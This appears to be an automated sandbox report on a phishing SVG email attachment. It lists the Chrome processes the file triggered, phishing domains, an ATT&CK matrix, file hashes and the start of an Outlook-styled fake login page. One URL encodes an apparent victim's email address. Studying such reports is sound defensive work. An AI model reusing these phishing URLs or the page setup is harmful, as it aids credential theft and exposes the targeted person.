                Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.16:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.33.187.120:443 -> 192.168.2.16:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.16:49772 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.0.100:443 -> 192.168.2.16:49773 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49774 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 95.101.182.98:443 -> 192.168.2.16:49776 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 95.101.182.98:443 -> 192.168.2.16:49775 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.16:49777 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 95.101.182.89:443 -> 192.168.2.16:49778 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 95.101.182.89:443 -> 192.168.2.16:49779 version: TLS 1.2
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir2972_183223187
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir2972_183223187
                Source: classification engineClassification label: mal100.phis.evad.winSVG@19/36@42/136
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
                Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\ATT61918.svg
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2112,i,14787941523726890264,17660487757620399097,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2180 /prefetch:3
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2112,i,14787941523726890264,17660487757620399097,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2180 /prefetch:3
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: 0.2.d.script.csv, type: HTML
                Source: Yara matchFile source: 1.11..script.csv, type: HTML
                Source: Yara matchFile source: 1.12..script.csv, type: HTML
                Source: Yara matchFile source: 1.3.pages.csv, type: HTML
                Source: Yara matchFile source: 1.4.pages.csv, type: HTML
                Source: Yara matchFile source: 1.5.pages.csv, type: HTML
                Source: Yara matchFile source: 1.6.pages.csv, type: HTML
                Source: Yara matchFile source: 1.7.pages.csv, type: HTML
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid AccountsWindows Management Instrumentation1
                Browser Extensions
                1
                Process Injection
                12
                Masquerading
                OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Scripting
                1
                Extra Window Memory Injection
                1
                Process Injection
                LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information
                Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                File Deletion
                NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
                Ingress Tool Transfer
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Extra Window Memory Injection
                LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://jx7d.qdjcpol.ru/WpB8P/0%Avira URL Cloudsafe
                https://jx7d.qdjcpol.ru/opLSiaB9ByXzXiMLXkUtTDVNvC5uvO3K5VoVfvy4h6Q4hC6ljuJ8SswDsKef1950%Avira URL Cloudsafe
                https://aadcdn.msauthimages.net/c1c6b6c8-5kvzmnbiwnxveuugfi6pfkasym43gvzae849badagts/logintenantbranding/0/illustration?ts=6375800272989527030%Avira URL Cloudsafe
                https://jx7d.qdjcpol.ru/GDSherpa-regular.woff0%Avira URL Cloudsafe
                https://jx7d.qdjcpol.ru/wx1tT22QUEgCZaGjn5nvopa9nekPTk1HUOZXab1800%Avira URL Cloudsafe
                https://jx7d.qdjcpol.ru/GDSherpa-vf.woff20%Avira URL Cloudsafe
                https://aadcdn.msauthimages.net/c1c6b6c8-5kvzmnbiwnxveuugfi6pfkasym43gvzae849badagts/logintenantbranding/0/bannerlogo?ts=6375800339989592380%Avira URL Cloudsafe
                https://jx7d.qdjcpol.ru/34RYny4Df6mtfDjmiKr0cnjcs1ij2pkVWqY1OIag671100%Avira URL Cloudsafe
                https://vk3z.qxwhvv.ru/gando!14n8b0%Avira URL Cloudsafe
                https://xd0blkqxjnyla9ewor4shw8juc2a0v3y2amqpz6jwi7hqrupfl.idrisxw.es/566903420842701463366367vvZrDRCudQFGGZXQBWROEIZCCKNRGZFUSHNRCWJDMHQPDVHSSOLOPVEBHXHYLQrsOggfteaZTCkGyBSlnA12y2Duv400%Avira URL Cloudsafe
                https://jx7d.qdjcpol.ru/yvXjoYkmQFZJWf6TvRNY1h0%Avira URL Cloudsafe
                https://jx7d.qdjcpol.ru/GDSherpa-bold.woff20%Avira URL Cloudsafe
                https://a.nel.cloudflare.com/report/v4?s=5VoiCO4HJGLEb%2Fq4mjvpak6j1iaxn3A5ycNP31mneisOjWSjVbLClkoERWUAMwF9s1%2FXkHcwQtUv6SYqxxBMV7epbkh4BLwK1qLWKdb%2BMJQruozf64qk5F%2F34KpV0%Avira URL Cloudsafe
                https://jx7d.qdjcpol.ru/GDSherpa-regular.woff20%Avira URL Cloudsafe
                https://jx7d.qdjcpol.ru/560ZS9mOYZWpzpxydDyD89200%Avira URL Cloudsafe
                https://jx7d.qdjcpol.ru/ijxklk3o1uVrqMrRUBGmWAprfMcMwxTiET7gzJd6S83STchwGwZuL11561690%Avira URL Cloudsafe
                https://jx7d.qdjcpol.ru/rvc8hP5OiiRCTBRKrpSWcixJnab1LN0CtOzu45Y5NSG36o4V3zhPkzoC4r7vgz0%Avira URL Cloudsafe
                https://jx7d.qdjcpol.ru/ijHv87UWYgy42RuFaqcJLe5KATUkReoJHNxyNcH6nNwnShBAq6J0w1wvwef2090%Avira URL Cloudsafe
                https://jx7d.qdjcpol.ru/ab0AixXB22vfIpqWn0cd300%Avira URL Cloudsafe
                https://jx7d.qdjcpol.ru/xyGLXSn2E19C5lrK3XtkQ6hGT9tgiX03Dfw0%Avira URL Cloudsafe
                https://jx7d.qdjcpol.ru/GDSherpa-bold.woff0%Avira URL Cloudsafe
                https://jx7d.qdjcpol.ru/qrlWpcPtfLA5pIOkLmnFRGskA9fK6RUI4C451370%Avira URL Cloudsafe
                https://jx7d.qdjcpol.ru/mnkvw24wtUHFHQPbBtOlDRiEJcph9EHF7kklVwQjN3RPhoUSW6kMlvv9YtGJxK64RlM5uv2150%Avira URL Cloudsafe
                https://jx7d.qdjcpol.ru/efK2FIvDz4exzwBMGuiQzijGRS9SC3l3iixUgqu1a781500%Avira URL Cloudsafe
                https://jx7d.qdjcpol.ru/favicon.ico0%Avira URL Cloudsafe
                https://jx7d.qdjcpol.ru/kltlxMUFc5Ka0cYZrVzSixKTKMTMsdITGWUoCYJQqrYmHorQqZhdPG6moFkzMoArn1I6wWQgRKkhyz2300%Avira URL Cloudsafe
                https://jx7d.qdjcpol.ru/wxqs5ePQhOj8nmB61sX2wzYme6YLopFevC0J0i2XjoCB341230%Avira URL Cloudsafe
                https://jx7d.qdjcpol.ru/GDSherpa-vf2.woff20%Avira URL Cloudsafe
                https://aadcdn.msauthimages.net/dbd5a2dd-n2kxueriy-dm8fhyf0anvulmvhi3kdbkkxqluuekyfc/logintenantbranding/0/illustration?ts=6386408660374636630%Avira URL Cloudsafe
                https://aadcdn.msauthimages.net/dbd5a2dd-n2kxueriy-dm8fhyf0anvulmvhi3kdbkkxqluuekyfc/logintenantbranding/0/bannerlogo?ts=6367835606971710890%Avira URL Cloudsafe
                https://xd0blkqxjnyla9ewor4shw8juc2a0v3y2amqpz6jwi7hqrupfl.idrisxw.es/566903420842701463366367vvZrDRCudQFGGZXQBWROEIZCCKNRGZFUSHNRCWJDMHQPDVHSSOLOPVEBHXHYLQrsCzCTvhuXE1rP0onyzkewx360%Avira URL Cloudsafe
                https://xd0blkqxjnyla9ewor4shw8juc2a0v3y2amqpz6jwi7hqrupfl.idrisxw.es/566903420842701463366367vvZrDRCudQFGGZXQBWROEIZCCKNRGZFUSHNRCWJDMHQPDVHSSOLOPVEBHXHYLQyzIHE7onfGy78LooHop500%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                vk3z.qxwhvv.ru
                188.114.97.3
                truefalse
                  unknown
                  a.nel.cloudflare.com
                  35.190.80.1
                  truefalse
                    high
                    e329293.dscd.akamaiedge.net
                    95.101.182.98
                    truefalse
                      high
                      developers.cloudflare.com
                      104.16.2.189
                      truefalse
                        high
                        github.com
                        140.82.121.3
                        truefalse
                          high
                          jx7d.qdjcpol.ru
                          104.21.78.6
                          truetrue
                            unknown
                            code.jquery.com
                            151.101.194.137
                            truefalse
                              high
                              cdnjs.cloudflare.com
                              104.17.24.14
                              truefalse
                                high
                                challenges.cloudflare.com
                                104.18.94.41
                                truefalse
                                  high
                                  get.geojs.io
                                  104.26.1.100
                                  truefalse
                                    high
                                    www.google.com
                                    142.250.186.36
                                    truefalse
                                      high
                                      d19d360lklgih4.cloudfront.net
                                      13.33.187.68
                                      truefalse
                                        high
                                        xd0blkqxjnyla9ewor4shw8juc2a0v3y2amqpz6jwi7hqrupfl.idrisxw.es
                                        188.114.97.3
                                        truefalse
                                          unknown
                                          objects.githubusercontent.com
                                          185.199.108.133
                                          truefalse
                                            high
                                            aadcdn.msauthimages.net
                                            unknown
                                            unknownfalse
                                              high
                                              ok4static.oktacdn.com
                                              unknown
                                              unknownfalse
                                                high
                                                NameMaliciousAntivirus DetectionReputation
                                                https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7false
                                                  high
                                                  https://aadcdn.msauthimages.net/dbd5a2dd-n2kxueriy-dm8fhyf0anvulmvhi3kdbkkxqluuekyfc/logintenantbranding/0/bannerlogo?ts=636783560697171089false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://jx7d.qdjcpol.ru/GDSherpa-regular.wofffalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://jx7d.qdjcpol.ru/yvXjoYkmQFZJWf6TvRNY1hfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                                    high
                                                    https://aadcdn.msauthimages.net/c1c6b6c8-5kvzmnbiwnxveuugfi6pfkasym43gvzae849badagts/logintenantbranding/0/illustration?ts=637580027298952703false
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                      high
                                                      https://aadcdn.msauthimages.net/dbd5a2dd-n2kxueriy-dm8fhyf0anvulmvhi3kdbkkxqluuekyfc/logintenantbranding/0/illustration?ts=638640866037463663false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://vk3z.qxwhvv.ru/gando!14n8bfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://jx7d.qdjcpol.ru/wx1tT22QUEgCZaGjn5nvopa9nekPTk1HUOZXab180false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.cssfalse
                                                        high
                                                        https://jx7d.qdjcpol.ru/opLSiaB9ByXzXiMLXkUtTDVNvC5uvO3K5VoVfvy4h6Q4hC6ljuJ8SswDsKef195false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://aadcdn.msauthimages.net/c1c6b6c8-5kvzmnbiwnxveuugfi6pfkasym43gvzae849badagts/logintenantbranding/0/bannerlogo?ts=637580033998959238false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://jx7d.qdjcpol.ru/GDSherpa-vf.woff2false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://jx7d.qdjcpol.ru/34RYny4Df6mtfDjmiKr0cnjcs1ij2pkVWqY1OIag67110false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://xd0blkqxjnyla9ewor4shw8juc2a0v3y2amqpz6jwi7hqrupfl.idrisxw.es/566903420842701463366367vvZrDRCudQFGGZXQBWROEIZCCKNRGZFUSHNRCWJDMHQPDVHSSOLOPVEBHXHYLQrsOggfteaZTCkGyBSlnA12y2Duv40false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                                          high
                                                          https://jx7d.qdjcpol.ru/GDSherpa-bold.woff2false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://jx7d.qdjcpol.ru/rvc8hP5OiiRCTBRKrpSWcixJnab1LN0CtOzu45Y5NSG36o4V3zhPkzoC4r7vgzfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://jx7d.qdjcpol.ru/560ZS9mOYZWpzpxydDyD8920false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://a.nel.cloudflare.com/report/v4?s=5VoiCO4HJGLEb%2Fq4mjvpak6j1iaxn3A5ycNP31mneisOjWSjVbLClkoERWUAMwF9s1%2FXkHcwQtUv6SYqxxBMV7epbkh4BLwK1qLWKdb%2BMJQruozf64qk5F%2F34KpVfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://jx7d.qdjcpol.ru/GDSherpa-regular.woff2false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://jx7d.qdjcpol.ru/ijxklk3o1uVrqMrRUBGmWAprfMcMwxTiET7gzJd6S83STchwGwZuL1156169false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://jx7d.qdjcpol.ru/WpB8P/#bWVsYW5pZS53YWx0b25Ac3BpcmVoZWFsdGhjYXJlLmNvbQ==false
                                                            unknown
                                                            https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.cssfalse
                                                              high
                                                              https://jx7d.qdjcpol.ru/ijHv87UWYgy42RuFaqcJLe5KATUkReoJHNxyNcH6nNwnShBAq6J0w1wvwef209false
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://jx7d.qdjcpol.ru/GDSherpa-bold.wofffalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://developers.cloudflare.com/favicon.pngfalse
                                                                high
                                                                https://jx7d.qdjcpol.ru/ab0AixXB22vfIpqWn0cd30false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.jsfalse
                                                                  high
                                                                  https://jx7d.qdjcpol.ru/xyGLXSn2E19C5lrK3XtkQ6hGT9tgiX03Dfwfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://jx7d.qdjcpol.ru/qrlWpcPtfLA5pIOkLmnFRGskA9fK6RUI4C45137false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://xd0blkqxjnyla9ewor4shw8juc2a0v3y2amqpz6jwi7hqrupfl.idrisxw.es/566903420842701463366367vvZrDRCudQFGGZXQBWROEIZCCKNRGZFUSHNRCWJDMHQPDVHSSOLOPVEBHXHYLQrsCzCTvhuXE1rP0onyzkewx36false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://jx7d.qdjcpol.ru/mnkvw24wtUHFHQPbBtOlDRiEJcph9EHF7kklVwQjN3RPhoUSW6kMlvv9YtGJxK64RlM5uv215false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://jx7d.qdjcpol.ru/favicon.icofalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://jx7d.qdjcpol.ru/WpB8P/true
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://jx7d.qdjcpol.ru/efK2FIvDz4exzwBMGuiQzijGRS9SC3l3iixUgqu1a78150false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://get.geojs.io/v1/ip/geo.jsonfalse
                                                                    high
                                                                    https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKtrue
                                                                      unknown
                                                                      https://jx7d.qdjcpol.ru/wxqs5ePQhOj8nmB61sX2wzYme6YLopFevC0J0i2XjoCB34123false
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://jx7d.qdjcpol.ru/GDSherpa-vf2.woff2false
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://xd0blkqxjnyla9ewor4shw8juc2a0v3y2amqpz6jwi7hqrupfl.idrisxw.es/566903420842701463366367vvZrDRCudQFGGZXQBWROEIZCCKNRGZFUSHNRCWJDMHQPDVHSSOLOPVEBHXHYLQyzIHE7onfGy78LooHop50false
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://jx7d.qdjcpol.ru/kltlxMUFc5Ka0cYZrVzSixKTKMTMsdITGWUoCYJQqrYmHorQqZhdPG6moFkzMoArn1I6wWQgRKkhyz230false
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      142.250.185.78
                                                                      unknownUnited States
                                                                      15169GOOGLEUSfalse
                                                                      95.101.182.89
                                                                      unknownEuropean Union
                                                                      20940AKAMAI-ASN1EUfalse
                                                                      104.18.94.41
                                                                      challenges.cloudflare.comUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      104.26.1.100
                                                                      get.geojs.ioUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      104.16.5.189
                                                                      unknownUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      142.250.186.131
                                                                      unknownUnited States
                                                                      15169GOOGLEUSfalse
                                                                      151.101.194.137
                                                                      code.jquery.comUnited States
                                                                      54113FASTLYUSfalse
                                                                      35.190.80.1
                                                                      a.nel.cloudflare.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      142.250.186.74
                                                                      unknownUnited States
                                                                      15169GOOGLEUSfalse
                                                                      104.16.2.189
                                                                      developers.cloudflare.comUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      142.250.186.99
                                                                      unknownUnited States
                                                                      15169GOOGLEUSfalse
                                                                      104.21.78.6
                                                                      jx7d.qdjcpol.ruUnited States
                                                                      13335CLOUDFLARENETUStrue
                                                                      104.17.24.14
                                                                      cdnjs.cloudflare.comUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      95.101.182.98
                                                                      e329293.dscd.akamaiedge.netEuropean Union
                                                                      20940AKAMAI-ASN1EUfalse
                                                                      1.1.1.1
                                                                      unknownAustralia
                                                                      13335CLOUDFLARENETUSfalse
                                                                      142.250.186.36
                                                                      www.google.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      13.33.187.120
                                                                      unknownUnited States
                                                                      16509AMAZON-02USfalse
                                                                      216.58.206.67
                                                                      unknownUnited States
                                                                      15169GOOGLEUSfalse
                                                                      74.125.71.84
                                                                      unknownUnited States
                                                                      15169GOOGLEUSfalse
                                                                      13.33.187.68
                                                                      d19d360lklgih4.cloudfront.netUnited States
                                                                      16509AMAZON-02USfalse
                                                                      140.82.121.3
                                                                      github.comUnited States
                                                                      36459GITHUBUSfalse
                                                                      216.58.206.46
                                                                      unknownUnited States
                                                                      15169GOOGLEUSfalse
                                                                      188.114.97.3
                                                                      vk3z.qxwhvv.ruEuropean Union
                                                                      13335CLOUDFLARENETUSfalse
                                                                      188.114.96.3
                                                                      unknownEuropean Union
                                                                      13335CLOUDFLARENETUSfalse
                                                                      185.199.108.133
                                                                      objects.githubusercontent.comNetherlands
                                                                      54113FASTLYUSfalse
                                                                      104.26.0.100
                                                                      unknownUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      IP
                                                                      192.168.2.16
                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                      Analysis ID:1642737
                                                                      Start date and time:2025-03-19 10:47:05 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:12
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • EGA enabled
                                                                      Analysis Mode:stream
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:ATT61918.svg
                                                                      Detection:MAL
                                                                      Classification:mal100.phis.evad.winSVG@19/36@42/136
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .svg
                                                                      • Exclude process from analysis (whitelisted): dllhost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 142.250.186.99, 142.250.185.78, 216.58.206.46, 74.125.71.84, 172.217.23.110, 142.250.185.110
                                                                      • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: jx7d.qdjcpol.ru
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:HTML document, ASCII text, with very long lines (52003), with CRLF line terminators
                                                                      Category:downloaded
                                                                      Size (bytes):151410
                                                                      Entropy (8bit):5.92970539342673
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:877AA5BC8679786E4757A9004F2A9BF6
                                                                      SHA1:CC86A1DFEDFFFD92F569706836BED66E85AD3B39
                                                                      SHA-256:B536710D065E1CC2DF7C9D1928E6D1D27C8BEA0275194B76FAE2794F3C6EA8ED
                                                                      SHA-512:B1E9ED05333AFF3C73E2E56A720C71A4883AEE11C5A7FCCA3AEF129D9B82B5307E46682CD207DE9D33E1264F7C51FC5A08F30A216E000DEA3461BA4FA3635E25
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFK
                                                                      Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">.. <meta name="robots" content="noindex, nofollow">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>&#8203;</title>.. <style id="outlooklogostyle">..body#outlooklogo {.. background-color: #fff;.. height: 100%;.. overflow: hidden;..}....:root {.. --s: 180px;.. --envW: 130px;.. --envH: 71px;.. --calW: 118px;.. --sqW: calc(var(--calW) / 3);.. --sqH: 37px;.. --calHH: 20px;.. --calH: calc(var(--sqH) * 3 + var(--calHH));.. --calY: calc(var(--calH) + 20px);.. --calYExt: calc(var(--calH) - 80px);.. --calYOverExt: calc(var(--calH) - 92px);.. --flapS: 96px;.. --flapH: calc(0.55 * var(--envH));.. --flapScaleY: calc(var(--flapH) / var(--flapWidth));.. --dur: 5s..}..#containerShadow,#ef{border-radius:0 0 7px 7px;}..#cal,#cal>.r{display:flex;}..#fmask,#openedFlap{width:var(--envW);height:107px;}..#ca
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with very long lines (10450)
                                                                      Category:downloaded
                                                                      Size (bytes):10498
                                                                      Entropy (8bit):5.327380141461276
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:E0D37A504604EF874BAD26435D62011F
                                                                      SHA1:4301F0D2B729AE22ADECE657D79ECCAA25F429B1
                                                                      SHA-256:C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
                                                                      SHA-512:EF838FD58E0D12596726894AB9418C1FBE31833C187C3323EBFD432970EB1593363513F12114E78E008012CDEF15B504D603AFE4BB10AE5C47674045ACC5221E
                                                                      Malicious:false
                                                                      Reputation:unknown
                                                                      URL:https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
                                                                      Preview:a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{background:transparent;border:0;font-size:100%;font:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}:focus{outline:0}ins{text-decoration:none}del{text-decoration:line-through}table{border-collapse:collapse;border-spacing:0}input[type=hidden]{display:none!important}input[type=checkbox],input[type=radio]{border:0!important;margin:0;padding:0}@font-face{font-family:Proxima Nova;font-style:normal;font-weight:400;src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot);src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot?#iefix) fo
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=4500, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=8000], progressive, precision 8, 1920x1080, components 3
                                                                      Category:dropped
                                                                      Size (bytes):52793
                                                                      Entropy (8bit):6.646611534512564
                                                                      Encrypted:false
                                                                      SSDEEP:
                                                                      MD5:433B4DCA25A6599D482644366C69F73E
                                                                      SHA1:56849308A8E4DA062C197FA5C1A5EDFF139CB54D
                                                                      SHA-256:5F1DAE35D4DD7FFCD1E91F8F9D08EB8828E57B2392320FBA162B8812B08AE8E1
                                                                      SHA-512:46A9EB0D8ECE1138A2F4C35075E549DE9AAC238C85CDD8FBAF6865BC4B7CA9C2A445BAD7B1050FC727B3B636343CEC88A9027F7AA034D3AAFAC5A1B9A7CC567B
                                                                      Malicious:false
                                                                      Reputation:unknown
